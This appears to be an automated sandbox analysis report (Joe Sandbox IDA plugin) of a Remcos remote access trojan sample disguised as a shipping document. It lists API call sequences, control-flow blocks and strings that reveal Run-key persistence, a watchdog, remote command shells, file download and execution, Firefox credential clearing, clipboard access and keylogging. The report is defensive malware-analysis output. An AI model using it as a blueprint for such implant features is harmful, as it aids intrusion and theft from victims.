                                                      • API String ID: 1866151309-2070987746
                                                      • Opcode ID: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                      • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                      • Opcode Fuzzy Hash: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                      • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                      Control-flow Graph (basic blocks with their successor edges)
                                                      • Block 652: 412774-412787, RegCreateKeyW -> 653, 654
                                                      • Block 653: 4127c6 -> 656
                                                      • Block 654: 412789-4127c4, call 4022f8, call 401e07, RegSetValueExW, RegCloseKey -> 656
                                                      • Block 656: 4127c8-4127d4, call 401e13
                                                      APIs
                                                      • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                      • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,759237E0,?), ref: 004127AD
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,759237E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                      • API String ID: 1818849710-1051519024
                                                      • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                      • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                      • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                      • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

                                                      Control-flow Graph (basic blocks with their successor edges)
                                                      • Block 662: 40bed7-40bf03, call 401e8f, CreateMutexA, GetLastError
                                                      APIs
                                                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                      • GetLastError.KERNEL32 ref: 0040BEF1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateErrorLastMutex
                                                      • String ID: (CG
                                                      • API String ID: 1925916568-4210230975
                                                      • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                      • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                      • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                      • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                      Control-flow Graph (basic blocks with their successor edges)
                                                      • Block 665: 412513-41253f, RegOpenKeyExA -> 666, 667
                                                      • Block 666: 412541-412567, RegQueryValueExA, RegCloseKey -> 667, 668
                                                      • Block 667: 412572 -> 669
                                                      • Block 668: 412569-412570 -> 669
                                                      • Block 669: 412577-412583, call 401f66
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                      • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                      • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                      • Opcode Fuzzy Hash: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                      • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                                                      Control-flow Graph (basic blocks with their successor edges)
                                                      • Block 672: 4124b7-4124df, RegOpenKeyExA -> 673, 674
                                                      • Block 673: 4124e1-412509, RegQueryValueExA, RegCloseKey -> 674, 675
                                                      • Block 674: 41250f-412512
                                                      • Block 675: 41250b-41250e
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                      • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                      • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                      • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                      • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                                                      Control-flow Graph (basic blocks with their successor edges)
                                                      • Block 704: 43360d-433610 -> 705
                                                      • Block 705: 43361f-433622, call 43a88c -> 707
                                                      • Block 707: 433627-43362a -> 708, 709
                                                      • Block 708: 433612-43361d, call 442200 -> 705, 712
                                                      • Block 709: 43362c-43362d
                                                      • Block 712: 43362e-433632 -> 713, 714
                                                      • Block 713: 433638-433dec, call 433d58, call 437bd7 -> 714
                                                      • Block 714: 433ded-433e09, call 433d8b, call 437bd7
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                        • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3476068407-0
                                                      • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                      • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                      • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                      • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D

                                                      Control-flow Graph (basic blocks with their successor edges)
                                                      • Block 724: 446aff-446b0b -> 725, 726
                                                      • Block 725: 446b3d-446b48, call 445354 -> 733
                                                      • Block 726: 446b0d-446b0f -> 727, 728
                                                      • Block 727: 446b11-446b12 -> 728
                                                      • Block 728: 446b28-446b39, RtlAllocateHeap -> 730, 731
                                                      • Block 730: 446b14-446b1b, call 4447c5 -> 725, 736
                                                      • Block 731: 446b3b -> 733
                                                      • Block 733: 446b4a-446b4c
                                                      • Block 736: 446b1d-446b26, call 442200 -> 725, 728
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                      • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                      • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                      • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                      • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                      • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                        • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                        • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                        • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                        • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                        • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                        • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                        • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                        • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                        • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                        • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                        • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                      • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                        • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                        • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                        • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                      • Sleep.KERNEL32(000007D0), ref: 00407976
                                                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                        • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                      • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                      • API String ID: 2918587301-599666313
                                                      • Opcode ID: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                      • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                      • Opcode Fuzzy Hash: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                      • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0040508E
                                                        • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                        • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • __Init_thread_footer.LIBCMT ref: 004050CB
                                                      • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                      • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                        • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                        • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                        • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                      • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                      • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                      • CloseHandle.KERNEL32 ref: 004053CD
                                                      • CloseHandle.KERNEL32 ref: 004053D5
                                                      • CloseHandle.KERNEL32 ref: 004053E7
                                                      • CloseHandle.KERNEL32 ref: 004053EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                      • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                      • API String ID: 3815868655-81343324
                                                      • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                      • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                      • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                      • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                        • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                      • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                        • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                        • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                        • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                      • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                      • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                      • API String ID: 65172268-860466531
                                                      • Opcode ID: 5a81626a4609f3178aed30ff3a92a065a3326e2b32edd8bbe01bcb9fad261df8
                                                      • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                      • Opcode Fuzzy Hash: 5a81626a4609f3178aed30ff3a92a065a3326e2b32edd8bbe01bcb9fad261df8
                                                      • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                      APIs
                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                      • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                      • FindClose.KERNEL32(00000000), ref: 0040B517
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$CloseFile$FirstNext
                                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                      • API String ID: 1164774033-3681987949
                                                      • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                      • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                      • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                      • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                      APIs
                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                      • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                      • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                      • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$Close$File$FirstNext
                                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                      • API String ID: 3527384056-432212279
                                                      • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                      • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                      • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                      • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                      • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                        • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                      • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                      • API String ID: 726551946-3025026198
                                                      • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                      • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                      • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                      • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                      APIs
                                                      • OpenClipboard.USER32 ref: 004159C7
                                                      • EmptyClipboard.USER32 ref: 004159D5
                                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                      • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                      • CloseClipboard.USER32 ref: 00415A5A
                                                      • OpenClipboard.USER32 ref: 00415A61
                                                      • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                      • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                      • CloseClipboard.USER32 ref: 00415A89
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                      • String ID:
                                                      • API String ID: 3520204547-0
                                                      • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                      • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                      • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                      • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$1$2$3$4$5$6$7
                                                      • API String ID: 0-3177665633
                                                      • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                      • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                      • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                      • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00409B3F
                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                      • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                      • GetKeyState.USER32(00000010), ref: 00409B5C
                                                      • GetKeyboardState.USER32(?), ref: 00409B67
                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                      • String ID: 8[G
                                                      • API String ID: 1888522110-1691237782
